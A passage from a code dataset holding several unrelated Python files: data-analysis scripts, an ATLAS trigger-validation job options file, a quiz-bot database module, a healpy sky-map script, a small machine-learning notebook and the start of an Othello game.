numeric_stats(x))\n numeric_stat_dict = numeric_stat.to_dict()\n\n df_datetime = dataframe.select_dtypes(include=['datetime'])\n datetime_stat = df_datetime.apply(lambda x: datetime_stats(x))\n datetime_stat_dict = datetime_stat.to_dict()\n\n df_text = dataframe.select_dtypes(include=['object'])\n text_stat = df_text.apply(lambda x: text_stats(x))\n text_stat_dict = text_stat.to_dict()\n\n variable_stats_dict = {'Numeric': numeric_stat, 'Datetime': datetime_stat, 'Text': text_stat}\n\n return variable_stats_dict\n\n###############################################################################\n\n\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":16562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"542073428","text":"import pandas as pd\r\nimport datetime as dt\r\nimport os\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef get_folder_name(keyword):\r\n data_container = []\r\n for foldername in os.listdir():\r\n if keyword in foldername:\r\n data_container.append(foldername)\r\n else:\r\n pass\r\n return data_container\r\n\r\ndef read_all_csv(folder_list, selected_column):\r\n data_container = []\r\n total_files = len(folder_list)\r\n counter = 1\r\n for i in folder_list:\r\n df = pd.read_csv(i + '/OpenStudio/' + i + '/ModelToIdf/in.csv', usecols=selected_column)\r\n df['Date/Time'] = create_time()\r\n df1 = df.set_index(['Date/Time'])\r\n df1.index = pd.to_datetime(df1.index)\r\n df1.columns = [i]\r\n data_container.append(df1)\r\n\r\n print(f'{counter}/{total_files} DataFrame created, {total_files - counter} more files')\r\n counter +=1\r\n print('Generating DataFrame done\\nConcatenating...')\r\n dataframe = pd.concat(data_container, axis=1)\r\n print(\"DataFrame ready\")\r\n return dataframe\r\n\r\ndef create_time():\r\n date_time_column = []\r\n base_time = dt.datetime(2019, 1, 1)\r\n timedelta = dt.timedelta(hours=1)\r\n for i in range(8760):\r\n date_time_column.append(str(base_time))\r\n base_time +=timedelta\r\n return date_time_column\r\n\r\n#def plot_option(df):\r\n# resample = ''\r\n# while (resample is not 'daily') or (resample is not 'monthly') or (resample is not 'hourly'):\r\n# resample = input(\"Choose your resample mapping (hourly, daily, or monthly): \")\r\n# if resample == 'hourly':\r\n# axes = df.resample(\"H\").mean().plot(figsize=(18,6))\r\n# return axes\r\n# elif resample == 'daily':\r\n# axes = df.resample(\"D\").mean().plot(figsize=(18,6))\r\n# return axes\r\n# elif resample == 'monthly':\r\n# axes = df.resample(\"M\").mean().plot(figsize=(18,6))\r\n# return axes\r\n\r\nif __name__ == '__main__':\r\n temperature_column = ['Date/Time', 'ROOM1:Zone Mean Air Temperature [C](Hourly)']\r\n file = get_folder_name('00')\r\n df = read_all_csv(file, temperature_column)\r\n ax = df.resample(\"D\").mean().plot(figsize=(18,6))\r\n ax.legend(loc=2)\r\n ax.set_title(label='Far East Flora Dome Indoor Air Temperature Comparison', loc='center')\r\n ax.set_xlabel(xlabel='Date/Time')\r\n ax.set_ylabel(ylabel='Celsius Degree')\r\n\r\n plt.show()","sub_path":"TemperaturePlot.py","file_name":"TemperaturePlot.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"234745708","text":"# main jobOption\n\n\nfrom AthenaCommon.AthenaCommonFlags import athenaCommonFlags\nathenaCommonFlags.FilesInput=[\"root://eosatlas//eos/atlas/atlascerngroupdisk/trig-daq/validation/test_data/valid1.117050.PowhegPythia_P2011C_ttbar.merge.HITS.e2658_s1967_s1964/RDO.0119996._000032.pool.root.1\"]\n\njp.AthenaCommonFlags.PoolESDOutput=\"theoutput_EFonly.ESD.pool.root\"\nif not 'rec.doWriteESD' in dir():\n rec.doWriteESD=True\n\njp.AthenaCommonFlags.EvtMax=-1\n\nrec.doWriteRDO=False\nrec.doWriteAOD=False \nrec.doAOD=False \nrec.doWriteTAG=False \nrec.doTrigger=True\n\n\ndef muonOnly():\n TriggerFlags.Slices_all_setOff()\n# TriggerFlags.MuonSlice.setAll()\n TriggerFlags.MuonSlice.signatures=[['mu0noL1_fsperf', '', [], ['Muon'], ['RATE:SingleMuon', 'BW:Muon'],-1]]\n\nfrom TriggerJobOpts.TriggerFlags import TriggerFlags\nTriggerFlags.doHLT=True\n\nfrom TriggerMenu.menu.GenerateMenu import GenerateMenu\nGenerateMenu.overwriteSignaturesWith(muonOnly)\n\n\n# main jobOption\n\ninclude (\"RecExCommon/RecExCommon_topOptions.py\")\n\nStoreGateSvc = Service( \"StoreGateSvc\" )\nStoreGateSvc.Dump = True\n\nfrom MuonTruthAlgs.MuonTruthAlgsConf import MuonDetailedTrackTruthMaker\nfrom TrkTruthAlgs.TrkTruthAlgsConf import TrackTruthSelector\nfrom TrkTruthAlgs.TrkTruthAlgsConf import TrackParticleTruthAlg\n\ncols = [\"HLT_TrackCollection_forCB\",\"HLT_TrackCollection_MuonEFCombTrkTracks\"]\ncolsTP = [\"HLT_xAOD__TrackParticleContainer_MuonEFInfo_ExtrapTrackParticles\",\"HLT_xAOD__TrackParticleContainer_MuonEFInfo_CombTrackParticles\"]\n\ntopSequence += MuonDetailedTrackTruthMaker(name=\"TrigMuEFonlyDetailedTrackTruthMaker\", TrackCollectionNames = cols,OutputLevel=INFO )\n\nfor i in range(0, len(cols) ):\n topSequence += TrackTruthSelector(name= cols[i] + \"Selector\",\n DetailedTrackTruthName = cols[i] + \"Truth\",\n OutputName = cols[i] + \"Truth\",OutputLevel=INFO )\n topSequence += TrackParticleTruthAlg(name = cols[i]+\"TruthAlg\",\n TrackTruthName=cols[i]+\"Truth\",\n TrackParticleName = colsTP[i],OutputLevel=INFO )\nfrom MuonTruthAlgs.MuonTruthAlgsConf import Muon__MuonTruthDecorationAlg\ntopSequence += Muon__MuonTruthDecorationAlg(\"EFonlyMuonTruthDecorationAlg\",\n MuonTruthParticleContainerName = \"HLT_EFMuonTruthParticle\",\n CreateTruthSegments = False,OutputLevel=INFO)\nfrom MuonTruthAlgs.MuonTruthAlgsConf import MuonTruthAssociationAlg\ntopSequence += MuonTruthAssociationAlg(\"EFonlyMuonTruthAssociation\",\n MuonContainerName = \"HLT_xAOD__MuonContainer_MuonEFInfo\",\n MuonTruthParticleContainerName = \"HLT_EFMuonTruthParticle\",OutputLevel=INFO)\n\ndoMon = True\nif( doMon ):\n from MuonPhysValMonitoring.MuonPhysValMonitoringConf import MuonPhysValMonitoring__MuonPhysValMonitoringTool\n tool1 = MuonPhysValMonitoring__MuonPhysValMonitoringTool(\"EFonlyMuonPhysValMonitoringTool\")\n tool1.EnableLumi = False\n tool1.DetailLevel = 1\n tool1.OutputLevel = INFO\n tool1.MuonContainerName = \"HLT_xAOD__MuonContainer_MuonEFInfo\"\n tool1.MuonTruthParticleContainerName = \"HLT_EFMuonTruthParticle\"\n \n ToolSvc += tool1\n\n from AthenaMonitoring.AthenaMonitoringConf import AthenaMonManager\n topSequence += AthenaMonManager( \"PhysValMonManager\" ,OutputLevel=DEBUG)\n\n from AthenaCommon.AppMgr import ServiceMgr\n from GaudiSvc.GaudiSvcConf import THistSvc\n ServiceMgr += THistSvc()\n svcMgr.THistSvc.Output += [\"EFonlyMuonMonExample DATAFILE='EFonlyMuonMonExample.root' OPT='RECREATE'\"]\n \n monMan = topSequence.PhysValMonManager\n monMan.ManualDataTypeSetup = True\n monMan.DataType = \"monteCarlo\"\n monMan.Environment = \"altprod\"\n monMan.ManualRunLBSetup = True\n monMan.Run = 1\n monMan.LumiBlock = 1\n \n monMan.FileKey = \"EFonlyMuonMonExample\"\n monMan.AthenaMonTools += [ tool1 ]\n\n\n\n","sub_path":"athena/Trigger/TrigValidation/TrigMuonValidation/share/TrigMuonValidation_RTT_options_EFonly.py","file_name":"TrigMuonValidation_RTT_options_EFonly.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"33805507","text":"from collections import namedtuple\nimport psycopg2\n\nBonus = namedtuple('Bonus',\n 'id,number,round,category_id,subcategory_id,quinterest_id,tournament_id,leadin,created_at,updated_at,errors_count,formatted_leadin')\nBonusPart = namedtuple('BonusPart',\n 'id,bonus_id,text,answer,formatted_text,formatted_answer,created_at,updated_at,number,wikipedia_url')\nTournament = namedtuple('Tournament', 'id,year,name,difficulty,quality,address,type,link,created_at,updated_at')\nTossup = namedtuple('Tossup', 'id,text,answer,number,tournament_id,category_id,subcategory_id,round,created_at,updated_at,'\n 'quinterest_id,formatted_text,errors_count,formatted_answer,wikipedia_url')\nconnection = None\n\ncategory_id_to_alias_map = {\n 'geo': 20,\n 'geography': 20,\n 'hist': 18,\n 'history': 18,\n 'lit': 15,\n 'literature': 15,\n 'm': 14,\n 'myth': 14,\n 'p': 25,\n 'philo': 25,\n 'r': 19,\n 'religion': 19,\n 'sci': 17,\n 'science': 17,\n 'ss': 22,\n 'socialscience': 22,\n 'trash': 16,\n 'ce': 26,\n 'currentevents': 26,\n 'fa': 21,\n 'finearts': 21\n}\n\nsubcategory_id_to_alias_map = {\n # 40: ['cea', 'ceamerican'],\n # 42: ['ceo', 'ceother'],\n # 35: ['faam', 'fineartsamerican'],\n # 27: ['faav', 'fineartsaudiovisual'],\n # 8: ['faa', 'fineartsauditory'],\n # 45: ['fab', 'fineartsbritish'],\n # 50: ['fae', 'fineartseuropean'],\n # 77: ['fao', 'opera', 'fineartsopera'],\n # 25: ['faot', 'fineartsother'],\n # 2: ['fav', 'fineartsvisual'],\n # 43: ['faw', 'fineartsworld'],\n # 38: ['geoa', 'geoamerican'],\n 'bio': 14,\n 'biology': 14,\n 'chem': 5,\n 'chemistry': 5,\n 'cs': 23,\n 'math': 26,\n 'physics': 18\n\n # 14: ['bio', 'biology'],\n # 5: ['chem', 'chemistry'],\n # 23: ['cs', 'compsci', 'computerscience'],\n # 26: ['math'],\n # 10: ['osci', 'otherscience'],\n # 18: ['physics']\n # TODO finish this later i'm lazy\n}\n\nclass GlobalState:\n sessions = []\n skip_message = None\n\nstate = GlobalState()\n\ndef get_global_state():\n global state\n return state\n\ndef get_db_connection():\n global connection\n if connection is None:\n connection = psycopg2.connect('dbname=quizdb user=postgres')\n return connection\n\n\ntournaments = []\ndef get_tournaments():\n global tournaments\n if len(tournaments) == 0:\n conn = get_db_connection()\n tournaments = read_tournaments(conn)\n return tournaments\n\ndef read_tournaments(conn):\n cursor = conn.cursor()\n cursor.execute('SELECT * FROM tournaments')\n return list(map(Tournament._make, cursor.fetchall()))\n\n\ntournament_series = {'scop': 'scop', 'pace': 'pace', 'rmbat': 'rmbat', 'bhsat': 'bhsat', 'acf_regs': 'acf regionals', 'acf_fall': 'acf fall', 'co': 'chicago open'}\n\n\ndef get_bonus_batch(conn, arguments):\n # Who needs ORMs anyway amirite? This is literally the jankiest shit i've ever written but it works so...\n # TODO: use an ORM\n\n difficulties = []\n categories = []\n subcategories = []\n selected_tournaments = []\n for arg in arguments:\n if arg[0].isdigit():\n # Difficulty or year\n # Check if range\n if len(arg.split('-')) > 1:\n values = arg.split('-')\n difficulties = list(range(int(values[0]), int(values[1]) + 1))\n elif 0 < int(arg) < 10:\n difficulties = [int(arg)]\n else:\n # assume year\n if selected_tournaments[-1][1] == -1:\n selected_tournaments[-1] = (selected_tournaments[-1][0], int(arg))\n else:\n # Category, subcategory, or tournament\n for k in subcategory_id_to_alias_map.keys():\n if arg == k:\n subcategories.append(str(subcategory_id_to_alias_map[k]))\n for k in category_id_to_alias_map.keys():\n if arg == k:\n categories.append(str(category_id_to_alias_map[k]))\n if arg in tournament_series:\n selected_tournaments.append((tournament_series[arg], -1))\n\n category_conditional = '('\n category_conditional += ' OR '.join([f'bonuses.category_id={category}' for category in categories])\n category_conditional += ')'\n\n difficulty_conditional = '('\n difficulty_conditional += ' OR '.join([f'tournaments.difficulty={difficulty}' for difficulty in difficulties])\n difficulty_conditional += ')'\n\n subcategory_conditional = '('\n subcategory_conditional += ' OR '.join([f'bonuses.subcategory_id={subcategory}' for subcategory in subcategories])\n subcategory_conditional += ')'\n\n matching_tournament_records = []\n\n for t in selected_tournaments:\n if t[1] == -1:\n matching_tournament_records.extend([i for i in get_tournaments() if t[0] in i.name.lower()])\n else:\n matching_tournament_records.extend([i for i in get_tournaments() if t[0] in i.name.lower() and str(t[1]) in i.name.lower()])\n\n if len(matching_tournament_records) == 0 and len(selected_tournaments) != 0:\n raise Exception('No tournament matches your query')\n\n tournament_conditional = '(' if len(matching_tournament_records) > 0 else ''\n tournament_conditional += ' OR '.join([f'tournaments.id={t.id}' for t in matching_tournament_records]) + ')'\n\n if len(difficulties) > 0:\n sql_command = 'SELECT bonuses.* FROM bonuses,tournaments WHERE bonuses.tournament_id=tournaments.id AND ' + difficulty_conditional\n if len(subcategories) > 0:\n sql_command += ' AND ' + subcategory_conditional\n if len(categories) > 0:\n sql_command += ' AND ' + category_conditional\n if len(selected_tournaments) > 0:\n sql_command += ' AND ' + tournament_conditional\n elif len(subcategories) > 0 or len(categories) > 0 or len(tournament_conditional) > 0:\n sql_command = 'SELECT bonuses.* FROM bonuses,tournaments WHERE bonuses.tournament_id=tournaments.id'\n if len(subcategories) > 0:\n sql_command += ' AND ' + subcategory_conditional\n if len(categories) > 0:\n sql_command += ' AND ' + category_conditional\n if len(selected_tournaments) > 0:\n sql_command += ' AND ' + tournament_conditional\n else:\n sql_command = 'SELECT * FROM bonuses'\n\n sql_command += \" ORDER BY RANDOM() LIMIT 20;\"\n print(f'Executing {sql_command}')\n return get_bonus_batch_raw(conn, sql_command)\n\n\ndef get_bonus_batch_raw(conn, sql_command):\n bonuses = []\n cursor = conn.cursor()\n cursor.execute(sql_command)\n for bonus in map(Bonus._make, cursor.fetchall()):\n cursor.execute(f\"SELECT * FROM bonus_parts WHERE bonus_id={bonus.id} ORDER BY number\")\n bonus_parts = list(map(BonusPart._make, cursor.fetchall()))\n if len(bonus_parts) == 0:\n # Unusable\n continue\n cursor.execute(f'SELECT * FROM tournaments WHERE id={bonus.tournament_id}')\n tournament = list(map(Tournament._make, cursor.fetchall()))\n assert len(tournament) == 1\n bonuses.append((bonus, bonus_parts, tournament[0]))\n\n return bonuses\n\n\n\n\n\n","sub_path":"pkbot-master/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"239573308","text":"import pandas as pd\nimport numpy as np\n\n#declaration\n#get data from https://www.bka.de/DE/AktuelleInformationen/StatistikenLagebilder/PolizeilicheKriminalstatistik/PKS2018/Standardtabellen/standardtabellenTatverdaechtige.html?nn=108686\n#download excel\nfile = pd.read_excel(\"STD-TV-01-T20-Tatverdaechtige_excel.xlsx\" , usecols =\"B,C,D\", skiprows=8)\nsave = pd.DataFrame(columns=['Verbrechen'])\nlen = file.shape\ncrimes = [[],[],[],[],[]]\ntemp = 0\n\n\nfor i in range(0, len[0], 3):\n\n #evaluate percent\n \n if file.iloc[i+1,2] > 0:\n temp = file.iloc[i+1,2]/file.iloc[i+2,2]*100\n else:\n temp = 0\n\n #check percent change the range to whatever\n if temp>50 and temp<=100:\n crimes[0].append(str(file.iloc[i,0]))\n crimes[1].append(temp.round(2))\n crimes[2].append(file.iloc[i,2])\n crimes[3].append(file.iloc[i+1,2])\n crimes[4].append(file.iloc[i+2,2])\n \n#add to pandas dataframe \nsave['Verbrechen'] = crimes[0]\nsave['Prozentualer Anteil'] = crimes[1]\nsave['Anzahl Männer'] = crimes[2]\nsave['Anzahl Frauen'] = crimes[3]\nsave['Gesamt'] = crimes[4]\n\nprint(save)\nsave.to_csv('result.csv')","sub_path":"women_over_50.py","file_name":"women_over_50.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"637605191","text":"import sys\nfrom itertools import permutations\n\nN,M = map(int,input().split())\nDNAs = []\nfor _ in range(N):\n DNAs.append(input().rstrip())\n\nS=['A','C','G','T']\nresult_DNA = []\ndiff=0\nfor i in range(M):\n temp=[]\n max_c=0\n ans=''\n for dna in DNAs:\n temp.append(dna[i])\n\n for s in S:\n c = temp.count(s)\n if c > max_c:\n max_c = c\n ans=s\n \n for dna in DNAs:\n if dna[i] != ans:\n diff+=1\n\n result_DNA.append(ans)\n\nprint(''.join(result_DNA))\nprint(diff)\n\n","sub_path":"백준/Python/알고파/완전탐색,백트래킹/1969%(DNA).py","file_name":"1969%(DNA).py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"407105","text":"import healpy as hp\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.colors import LogNorm\n\n# Set the number of sources and the coordinates for the input\n#nsources = int(2664001)\n#nsources = int(3149)\nnsources = int(1268174)\n\nnside = 64\nnpix = hp.nside2npix(nside)\n\n# npix= 12*nside^2\n# Coordinates and the density field f\n#thetas = np.random.random(nsources) * np.pi\n#phis = np.random.random(nsources) * np.pi * 2.\n\nfs = np.random.randn(nsources)\n\nwith open(\"./eventFile_data_noHead_eta08.txt\") as inputFile:\n lines = inputFile.readlines()\n #print (lines[1].split()[1])\nthetas=[]\nphis=[]\nfor i in range(nsources): \n thetas.append(float(lines[i+1].split()[1]))\n phis.append(float(lines[i+1].split()[2]))\n #if(thetas[0]<0 or thetas[0]>3.14): \n # print(\"theta out of range\")\n#print(thetas)\n\n# Go from HEALPix coordinates to indices\nindices = hp.ang2pix(nside, thetas, phis)\n\n# Initate the map and fill it with the values\nhpxmap = np.zeros(npix, dtype=np.float)\nfor i in range(nsources):\n #hpxmap[indices[i]] += fs[i]\n #hpxmap[indices[i]] += 1.0\n hpxmap[indices[i]] += 12.0*nside*nside/nsources\n#for j in range(npix):\n# if hpxmap[j] < 0.000001:\n# hpxmap[j] = 0.000001\n\nDPI = 100\nSIZE = 800\n\n# Inspect the map\n#plt.figure(1)\n\n#hp.mollview(hpxmap, xsize = SIZE)\n#map_ring = hp.pixelfunc.reorder(hpxmap, inp='NEST', out='RING')\nhp_smoothed = hp.sphtfunc.smoothing(hpxmap, fwhm=np.radians(5))\n#hp_smoothed = hp.sphtfunc.smoothing(hpxmap, fwhm=np.radians(5.0*3.14/180))\n#hp_smoothed = hp.smoothing(hpxmap, fwhm=np.radians(5.0*3.14/180))\n#hp_smoothed = hp.sphtfunc.smoothing(hpxmap, sigma=np.radians(5.0*3.14/180))\n#hp_smoothed = hp.smoothing(hpxmap, fwhm=60, arcmin=True)\n#hp.mollview(hp_smoothed, nest=False, xsize = SIZE, cmap=cm.jet, norm = 'hist', title='CMS UCC smoothed')\n#cmap_tmp = cm.jet\n#cmap_tmp.set_bad(\"gray\")\n#cmap_tmp.set_under(\"white\")\nhp.mollview(hp_smoothed, nest=False, xsize = SIZE, cmap=cm.jet, norm=\"hist\", title='CMS UCC smoothed') #jet/rainbow/seismic/bwr; norm=\"hist\"/LogNorm()\nhp.graticule()\n#plt.savefig(\"plot_uccData_3149m_smoothed.png\", dpi = DPI)\n#plt.savefig(\"plot_rapidity08_uccData_allEvents_smoothed.png\", dpi = DPI)\nplt.savefig(\"plot_rapidity08_uccData_allEvents_withnormhist_smoothed.png\", dpi = DPI)\n#plt.savefig(\"plot_uccData_oneEvents_smoothed.png\", dpi = DPI)\n\n\n'''\n#plt.figure(2)\n# Get the power spectrum\nCl = hp.anafast(hpxmap)\n#print(Cl)\nplt.plot(Cl)\nplt.ylabel('C_{l}')\nplt.savefig('plot_uccData_power_spectrum.png')\n'''\n\n","sub_path":"healpy/tutorial/pbpbUCC/rapidity08_uccData_power_spectrum.py","file_name":"rapidity08_uccData_power_spectrum.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"255409483","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt \nfrom sklearn import svm\nfrom sklearn import metrics\nimport joblib\nfrom sklearn.decomposition import PCA\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport seaborn as sns\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\n\n\n# In[8]:\n\n\ndataframe = pd.read_csv(\"Downloads\\Mark2.csv\")\n\n\n# In[9]:\n\n\ndataframe.head()\n\n\n# In[10]:\n\n\ndataframe.shape\n\n\n# In[11]:\n\n\ndataframe.describe()\n\n\n# In[12]:\n\n\nsns.pairplot(dataframe[['cough','chest_pain','fatigue','back_pain','acidity','prognosis']],hue='prognosis')\n\n\n# In[13]:\n\n\ntrain=dataframe.drop('prognosis',axis=1)\ntrain.head()\n\n\n# In[14]:\n\n\nprognosis=dataframe.prognosis\nprognosis.head()\n\n\n# In[15]:\n\n\nX_train, X_test, Y_train, Y_test = train_test_split(train,prognosis, test_size=0.2, random_state=0)\nprint(\"X_train size ==>\", X_train.shape)\nprint(\"X_test size ==>\", X_test.shape)\nprint(\"Y_train size ==>\", Y_train.shape)\nprint(\"Y_test size ==>\", Y_test.shape)\n\n\n# In[16]:\n\n\nclf1=svm.SVC(kernel='linear')\nclf1.fit(X_train,Y_train)\nY_pred=clf1.predict(X_test)\n\n\n# In[18]:\n\n\nprint(\"Accuracy:\" ,metrics.accuracy_score(Y_test,Y_pred))\nprint(\"Precision:\",metrics.precision_score(Y_test,Y_pred,average='micro'))\n\n\n# In[19]:\n\n\nfrom sklearn.linear_model import LogisticRegression\n\n\n# In[20]:\n\n\nclf = LogisticRegression()\nclf.fit(X_train, Y_train)\nY_pred=clf.predict(X_test)\n\n\n# In[23]:\n\n\nprint(\"Accuracy:\" ,metrics.accuracy_score(Y_test,Y_pred))\nprint(\"Precision:\",metrics.precision_score(Y_test,Y_pred,average='micro'))\n\n\n# In[24]:\n\n\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler()\nscaler.fit(X_train)\n\nX_train = scaler.transform(X_train)\nX_test = scaler.transform(X_test)\n\n\n# In[25]:\n\n\nfrom sklearn.neighbors import KNeighborsClassifier\nclassifier = KNeighborsClassifier(n_neighbors=5)\nclassifier.fit(X_train, Y_train)\n\n\n# In[26]:\n\n\nY_pred = classifier.predict(X_test)\n\n\n# In[28]:\n\n\nprint(\"Accuracy:\" ,metrics.accuracy_score(Y_test,Y_pred))\nprint(\"Precision:\",metrics.precision_score(Y_test,Y_pred,average='micro'))\n\n\n# In[29]:\n\n\nimport pickle\n\n\n# In[30]:\n\n\nwith open('mark11_pickle','wb') as f:\n pickle.dump(clf1,f)\n\n\n# In[31]:\n\n\nwith open('mark11_pickle','rb') as f:\n mp = pickle.load(f)\n\n\n# In[32]:\n\n\nmp.predict(X_test)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"DD_models/Marks11.py.py","file_name":"Marks11.py.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"87658576","text":"import datetime\nimport sys\nfrom doctest import testmod\n\nfrom upemtk import *\n\nTAILLE_CASE = 75\nTAILLE_PLATEAU = 8\n\nDIRECTIONS = [(0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1)]\n\nB = 1 # Blancs\nN = 0 # Noirs\nV = \".\" # Vide\nC = \"?\" # Coup possible\n\n\ndef pixel_vers_case(pixel: tuple, taille_case: int):\n \"\"\"\n Convertit les coordonées d'un pixel en coordonées d'une case du plateau.\n :param tuple pixel: Coordonées du pixel.\n :param int taille_case: Taille des cases.\n :return tuple: Coordonées de la case.\n\n >>> pixel_vers_case((100, 200), 50)\n (2, 4)\n \"\"\"\n i, j = pixel\n return i // taille_case, j // taille_case\n\n\ndef case_vers_pixel(case: tuple, taille_case: int):\n \"\"\"\n Donne le pixel au centre d'une case à partir de ses coordonées.\n :param tuple case: Coordonées de la case.\n :param int taille_case: Taille des cases.\n :return tuple: Coordonées du pixel.\n\n >>> case_vers_pixel((0, 0), 50)\n (25.0, 25.0)\n \"\"\"\n i, j = case\n return (i + .5) * taille_case, (j + .5) * taille_case\n\n\ndef init_plateau(taille: int):\n \"\"\"\n Génère une liste de listes correspondant au plateau.\n :param int taille: Longueur et largueur du plateau.\n :return list: Liste de listes d'entiers.\n\n >>> init_plateau(2)\n [['.', '.'], ['.', '.']]\n \"\"\"\n resultat = []\n for i in range(taille):\n resultat.append([V] * taille)\n return resultat\n\n\ndef dessine_plateau(plateau: list, ex_plateau: list, boutons: dict, joueur: int):\n \"\"\"\n Dessine le plateau à partir d'une liste de listes ainsi que la barre inférieure.\n :param list plateau: Liste contenant le plateau.\n :param list ex_plateau: Plateau du tour précédent.\n :param dict boutons: Dictionnaires des boutons du jeu.\n :param int joueur: Joueur actuel.\n \"\"\"\n index = 0\n y = 0\n efface_tout()\n while y < len(plateau):\n x = 0\n while x < len(plateau[y]):\n rectangle(x * TAILLE_CASE, y * TAILLE_CASE, x * TAILLE_CASE + TAILLE_CASE, y * TAILLE_CASE + TAILLE_CASE,\n tag=str(index), remplissage='darkgreen')\n x_pixel, y_pixel = case_vers_pixel((x, y), TAILLE_CASE)\n if plateau[y][x] == B:\n cercle(x_pixel, y_pixel, 9 * TAILLE_CASE / 20, remplissage=\"white\")\n elif plateau[y][x] == N:\n cercle(x_pixel, y_pixel, 9 * TAILLE_CASE / 20, remplissage=\"black\")\n elif plateau[y][x] == C:\n cercle(x_pixel, y_pixel, 9 * TAILLE_CASE / 20, remplissage=\"green\", couleur=\"darkgreen\")\n index += 1\n x += 1\n y += 1\n if joueur == B:\n rectangle(0, len(plateau) * TAILLE_CASE, len(plateau) * TAILLE_CASE,\n len(plateau) * TAILLE_CASE + regles['taille_barre'], remplissage=\"white\")\n texte(10, 10 + len(plateau) * TAILLE_CASE, \"Au tour des blancs\")\n if joueur == N:\n rectangle(0, len(plateau) * TAILLE_CASE, len(plateau) * TAILLE_CASE,\n len(plateau) * TAILLE_CASE + regles['taille_barre'], remplissage=\"black\")\n texte(10, 10 + len(plateau) * TAILLE_CASE, \"Au tour des noirs\", couleur=\"white\")\n boutons[\"quitter\"] = dessine_bouton(len(plateau) * TAILLE_CASE - 5,\n len(plateau) * TAILLE_CASE + regles['taille_barre'] - 5,\n \"Quitter\", ancrage='se')\n if ex_plateau is not None:\n boutons[\"annuler\"] = dessine_bouton(\n len(plateau) * TAILLE_CASE - 10 - (boutons[\"quitter\"][2] - boutons[\"quitter\"][0]),\n len(plateau) * TAILLE_CASE + regles['taille_barre'] - 5, \"Annuler\", ancrage='se')\n\n\ndef dessine_bouton(x: int, y: int, contenu: str, ancrage: str = 'nw', couleur: str = 'white', taille: int = 24,\n largeur: str = None):\n \"\"\"\n Dessine un bouton aux coordonnées renseignées.\n :param x: Abscisse du point d'ancrage.\n :param y: Ordonnée du point d'ancrage.\n :param contenu: Texte à insérer dans le bouton.\n :param ancrage: Ancrage du bouton.\n :param couleur: Couleur de remplissage du bouton.\n :param taille: Taille du texte.\n :param largeur: Chaîne de caractère déterminant la largeur du bouton.\n :return tuple: Coordonées du bouton.\n\n >>> cree_fenetre(0, 0)\n >>> dessine_bouton(0, 0, \"test\")\n (0, 0, 49, 35)\n >>> ferme_fenetre()\n \"\"\"\n if largeur is None:\n largeur = contenu\n longueur, hauteur = taille_texte(largeur, taille=taille)\n hauteur -= hauteur % 5\n if ancrage == 'nw':\n rectangle(x, y, x + longueur + 2 * 5, y + hauteur + 2 * 5, remplissage=couleur)\n texte(x + (longueur + 2 * 5) // 2, y + (hauteur + 2 * 5) // 2, contenu, ancrage='center', taille=taille)\n return x, y, x + longueur + 2 * 5, y + hauteur + 2 * 5\n elif ancrage == 'n':\n rectangle(x - (longueur + 2 * 5) // 2, y, x + (longueur + 2 * 5) // 2, y + hauteur + 2 * 5, remplissage=couleur)\n texte(x, y + (hauteur + 2 * 5) // 2, contenu, ancrage='center', taille=taille)\n return x - (longueur + 2 * 5) // 2, y, x + (longueur + 2 * 5) // 2, y + hauteur + 2 * 5\n elif ancrage == 'ne':\n rectangle(x - longueur - 2 * 5, y, x, y + hauteur + 2 * 5, remplissage=couleur)\n texte(x + (longueur + 2 * 5) // 2, y - (hauteur + 2 * 5) // 2, contenu, ancrage='center', taille=taille)\n return x - longueur - 2 * 5, y, x, y + hauteur + 2 * 5\n elif ancrage == 'e':\n rectangle(x - hauteur - 2 * 5, y - (hauteur + 2 * 5) // 2, x, y + (hauteur + 2 * 5) // 2, remplissage=couleur)\n texte(x - (longueur + 2 * 5) // 2, y, contenu, ancrage='center', taille=taille)\n return x - hauteur - 2 * 5, y - (hauteur + 2 * 5) // 2, x, y + (hauteur + 2 * 5) // 2\n elif ancrage == 'se':\n rectangle(x - longueur - 2 * 5, y - hauteur - 2 * 5, x, y, remplissage=couleur)\n texte(x - (longueur + 2 * 5) // 2, y - (hauteur + 2 * 5) // 2, contenu, ancrage='center', taille=taille)\n return x - longueur - 2 * 5, y - hauteur - 2 * 5, x, y\n elif ancrage == 's':\n rectangle(x - (longueur + 2 * 5) // 2, y - hauteur - 2 * 5, x + (longueur + 2 * 5) // 2, y, remplissage=couleur)\n texte(x, y - (hauteur + 2 * 5) // 2, contenu, ancrage='center', taille=taille)\n return x - (longueur + 2 * 5) // 2, y - hauteur - 2 * 5, x + (longueur + 2 * 5) // 2, y\n elif ancrage == 'sw':\n rectangle(x, y - hauteur - 2 * 5, x + longueur + 2 * 5, y, remplissage=couleur)\n texte(x + (longueur + 2 * 5) // 2, y - (hauteur + 2 * 5) // 2, contenu, ancrage='center', taille=taille)\n return x, y - hauteur 